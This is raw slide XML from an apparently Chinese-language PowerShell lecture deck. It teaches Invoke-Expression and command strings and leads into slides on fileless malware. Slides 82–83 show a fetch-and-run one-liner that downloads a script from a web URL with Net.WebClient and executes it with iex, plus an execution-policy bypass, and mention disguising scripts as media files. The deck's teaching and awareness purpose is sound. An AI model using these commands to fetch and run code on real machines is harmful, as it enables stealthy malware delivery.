              <a:gd name="connsiteX0" fmla="*/ 314960 w 314960"/>
              <a:gd name="connsiteY0" fmla="*/ 1178560 h 1178560"/>
              <a:gd name="connsiteX1" fmla="*/ 314960 w 314960"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1178560"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 314960"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 11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960" h="1178560">
                <a:moveTo>
                  <a:pt x="314960" y="1178560"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314960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751840" y="3220720"/>
            <a:ext cx="1666240" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1666240"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 101600"/>
              <a:gd name="connsiteX1" fmla="*/ 1666240 w 1666240"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 101600"/>
              <a:gd name="connsiteX2" fmla="*/ 1666240 w 1666240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6240" h="101600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1666240" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1666240" y="101600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="635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20320" y="3738880"/>
            <a:ext cx="274320" cy="782320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 274320 w 274320"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 782320"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 274320"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 782320"/>
              <a:gd name="connsiteX2" fmla="*/ 10160 w 274320"/>
              <a:gd name="connsiteY2" fmla="*/ 782320 h 782320"/>
              <a:gd name="connsiteX3" fmla="*/ 243840 w 274320"/>
              <a:gd name="connsiteY3" fmla="*/ 772160 h 78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782320">
                <a:moveTo>
                  <a:pt x="274320" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10160" y="782320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243840" y="772160"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="635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>
            <a:off x="2590800" y="3495040"/>
            <a:ext cx="365760" cy="1168400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 365760 w 365760"/>
              <a:gd name="connsiteY0" fmla="*/ 1168400 h 1168400"/>
              <a:gd name="connsiteX1" fmla="*/ 365760 w 365760"/>
              <a:gd name="connsiteY1" fmla="*/ 1066800 h 1168400"/>
              <a:gd name="connsiteX2" fmla="*/ 162560 w 365760"/>
              <a:gd name="connsiteY2" fmla="*/ 1056640 h 1168400"/>
              <a:gd name="connsiteX3" fmla="*/ 172720 w 365760"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1168400"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 365760"/>
              <a:gd name="connsiteY4" fmla="*/ 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" h="1168400">
                <a:moveTo>
                  <a:pt x="365760" y="1168400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="365760" y="1066800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162560" y="1056640"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="165947" y="704427"/>
                  <a:pt x="169333" y="352213"/>
                  <a:pt x="172720" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:prstDash val="dash"/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1097280" y="3759200"/>
            <a:ext cx="1098456" cy="1181968"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1127760"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1107440"/>
              <a:gd name="connsiteX1" fmla="*/ 1127760 w 1127760"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1107440"/>
              <a:gd name="connsiteX2" fmla="*/ 1117600 w 1127760"/>
              <a:gd name="connsiteY2" fmla="*/ 1107440 h 110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760" h="1107440">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127760" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1124373" y="369147"/>
                  <a:pt x="1120987" y="738293"/>
                  <a:pt x="1117600" y="1107440"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:prstDash val="dash"/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617352" y="4114800"/>
            <a:ext cx="116182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execute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  <a:endParaRPr lang="zh-TW" alt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598808" y="4581128"/>
            <a:ext cx="1535562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execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW" alt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>
            <a:off x="3347864" y="4293096"/>
            <a:ext cx="26948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3294400" y="4713063"/>
            <a:ext cx="269488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8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59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'Get-Process'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'$a'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'$a'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145      11     1420       1684          0  11152   1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116       9     1300       1576              3888   0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AsLdrSrv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261      16     5300       3260          0   7764   1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="18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ApplicationFrameHost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="18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ctr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1-3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6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='Get-Process'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'$a'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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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$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a'</a:t>
            </a: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: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無法辨識 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zh-TW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詞彙是否為 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Cmdlet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、函數、指令檔或可執行程式的名稱。請檢查名稱拼字是否正確，如果包含路徑的話，請確認路徑是否正確，然後再試一次。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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位於 線路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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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字元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:1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this is Get-Process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~~~~</a:t>
            </a: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CategoryInfo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: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ObjectNotFound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this:String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[],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CommandNotFoundException</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1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FullyQualifiedErrorId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW" sz="1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CommandNotFoundException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1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1-4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07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2276872"/>
            <a:ext cx="8064896" cy="4248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Users\F&gt;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$a=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'Get-Process'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'$a'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a"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"$a"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145      11     1420       1684          0  11152   1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116       9     1300       1576              3888   0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AsLdrSrv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261      16     5300       3260          0   7764   1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="18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ApplicationFrameHost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="18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ctr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“Get-Process”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'Get-Process' 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Get-Process</a:t>
            </a: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1-5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="左大括弧 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="5517232"/>
            <a:ext cx="144016" cy="72008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12428" y="493245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same result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419100" y="4826000"/>
            <a:ext cx="508000" cy="1051272"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 381000 w 508000"/>
              <a:gd name="connsiteY0" fmla="*/ 927100 h 927100"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 508000"/>
              <a:gd name="connsiteY1" fmla="*/ 927100 h 927100"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 508000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 927100"/>
              <a:gd name="connsiteX3" fmla="*/ 508000 w 508000"/>
              <a:gd name="connsiteY3" fmla="*/ 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927100">
                <a:moveTo>
                  <a:pt x="381000" y="927100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="927100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508000" y="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8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675467"/>
            <a:ext cx="8856984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 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-Command "C:\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ps-test\testscript.ps1“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="17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C:\Users\F&gt;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"C:\ps-test\testscript.ps1" | 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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW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/>
              <a:t>These commands use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/>
              <a:t> to run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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TestScript.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, on the local computer.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two commands are equivalent.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first uses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altLang="zh-TW" dirty="0"/>
              <a:t> parameter to specify the command to run.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second uses a pipeline operator (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altLang="zh-TW" dirty="0"/>
              <a:t>) to send the command string to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.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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79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Example 2: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Run a script on the local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>computer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85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PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將許多的資料都當成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>來處理，這樣可以讓許多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" u="sng" dirty="0"/>
              <a:t>工作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>指令稿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>撰寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>起來更方便。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>舉例來說，以下這行指令會產生一個簡單的字串：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Hello,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World“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Hello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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>事實上這行字串就是一個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b="1" u="sng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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng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zh-TW" altLang="en-US" u="sng" dirty="0"/>
              <a:t>框架的物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，我們可以透過它的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zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>屬性，得知此字串的長度：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Hello, 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World".Length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12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物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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Office Guide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手繪多邊形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3764280" y="3642360"/>
            <a:ext cx="228600" cy="274320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 457200 w 457200"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 274320"/>
              <a:gd name="connsiteX1" fmla="*/ 457200 w 457200"/>
              <a:gd name="connsiteY1" fmla="*/ 274320 h 274320"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 457200"/>
              <a:gd name="connsiteY2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274320">
                <a:moveTo>
                  <a:pt x="457200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="457200" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27432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3419872" y="3649980"/>
            <a:ext cx="3332232" cy="624840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3764280 w 3764280"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 624840"/>
              <a:gd name="connsiteX1" fmla="*/ 3764280 w 3764280"/>
              <a:gd name="connsiteY1" fmla="*/ 624840 h 624840"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 3764280"/>
              <a:gd name="connsiteY2" fmla="*/ 62484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4280" h="624840">
                <a:moveTo>
                  <a:pt x="3764280" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3764280" y="624840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="62484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2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9001000" cy="3450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C:\Users\h&gt;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 = 'Get-Process | where {$_.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1000} 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C:\Users\h&gt;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</a:t>
            </a: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 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where {$_.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1000}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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C:\Users\h&gt;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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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C:\Users\h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="17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'Get-Process | where {$_.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  <a:endParaRPr lang="en-US" altLang="zh-TW" sz="17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dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The command string is enclosed in single quotation marks because it includes a variable,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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which represents the current object. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>it were enclosed in double quotation marks,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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>variable would be replaced by its value before it was saved in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$Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>variable.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Example 3: Run a command in a variable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="左大括弧 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="3645024"/>
            <a:ext cx="107504" cy="43204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50800" y="3870960"/>
            <a:ext cx="1513840" cy="436880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1513840"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 436880"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1513840"/>
              <a:gd name="connsiteY1" fmla="*/ 436880 h 436880"/>
              <a:gd name="connsiteX2" fmla="*/ 1513840 w 1513840"/>
              <a:gd name="connsiteY2" fmla="*/ 436880 h 436880"/>
              <a:gd name="connsiteX3" fmla="*/ 1513840 w 1513840"/>
              <a:gd name="connsiteY3" fmla="*/ 436880 h 43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840" h="436880">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="436880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1513840" y="436880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1513840" y="436880"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/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547664" y="4211796"/>
            <a:ext cx="2376264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TW" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ave the same results.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9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2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C:\Users\h&gt;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$Command = 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“Get-Process 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where {$_.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}”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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C:\Users\h&gt;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Invoke-Expression $Command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C:\Users\h&gt; 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“Get-Process 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where {$_.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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}”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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The above two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 commands issue the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> messages.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sz="15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sz="15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"Get-Process | where {$_.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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1000}"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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 | where {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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sz="15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altLang="zh-TW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sz="15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altLang="zh-TW" sz="15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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="15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15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3-1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7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10445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 (i.e. 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dirty="0" smtClean="0"/>
              <a:t>) allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>us to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>we're getting the script from a website or a webserver, we can do something like this: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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PS&gt; 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‘https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www.justaprank.com/scripts/script1.ps1’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800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PS&gt; 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 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(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Net.Webclient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altLang="zh-TW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downloadstring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sz="1800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altLang="zh-TW" sz="18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altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>will download the whole contents of the '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script1.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>' file, allowing us to execute it with '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dirty="0"/>
              <a:t>' which is the shorthand alias of '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/>
              <a:t>'. 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cmdlet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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (1)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Dave-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Jones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="1" baseline="-250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腾讯云开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="1" baseline="-250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者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3ACC-DB9C-41B7-AAD9-18557339C754}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>82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640960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If we're getting the script from a file hosted on an SMB server, USB (Ducky/BB) or outside source, we can do something like this: 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(Get-Content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pathtoscript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\script1.txt) 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/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>beauty about both of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the ways in this slide and previous slide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is we don't have to have a specific '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.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>' extension on it, allowing us to load all kinds of scripts that can be disguised as pictures, video, text files etc. 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cmdlet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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)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2"/>
              </a:rPr>
              <a:t>Dave-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Jones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3ACC-DB9C-41B7-AAD9-18557339C754}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>83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2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675467"/>
            <a:ext cx="8784976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"Get-Process"</a:t>
            </a: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Get-Process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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endParaRPr lang="zh-TW" altLang="en-US" sz="2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19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======================================================================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powershell.exe -ep Bypass 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noexit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</a:t>
            </a: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(echo "Get-Process")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Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI 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endParaRPr lang="en-US" altLang="zh-TW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  ------    -----      -----     ------     --  -- -----------</a:t>
            </a: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145      11     1420       1812          0  11152   1 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acrotray</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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386       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5     4996       7608          1  13248   1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="20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APSDaemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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zh-TW" sz="20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ctr">
              <a:buNone/>
            </a:pP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US" altLang="zh-TW" sz="20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3ACC-DB9C-41B7-AAD9-18557339C754}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>84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altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Example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62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b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SS64.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="36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8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1" cy="3450696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Run a PowerShell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Accepts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a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altLang="zh-TW" dirty="0"/>
              <a:t> to be executed as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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. It is essential that any user input is carefully </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>validated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Syntax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[-command] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW" b="1" i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CommonParameters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/>
              <a:t>Key </a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW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 smtClean="0"/>
              <a:t>	A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literal string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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dirty="0"/>
              <a:t>(or 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altLang="zh-TW" dirty="0"/>
              <a:t> that contains a string) that is a valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>PowerShell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expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. 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Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Aliases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for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dirty="0"/>
              <a:t>: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endParaRPr lang="en-US" altLang="zh-TW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39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3200" b="1" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1" dirty="0"/>
              <a:t> Malware Attacks and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3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sz="3200" b="1" dirty="0"/>
              <a:t>: How They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Brien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Posey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr"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3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i="1" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t> malware attack based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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i="1" dirty="0"/>
              <a:t> uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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i="1" dirty="0"/>
              <a:t>’s native capabilities to breach a Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i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3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492896"/>
            <a:ext cx="8496944" cy="3849877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The reason is because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is designed to be an administrative tool.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Part </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
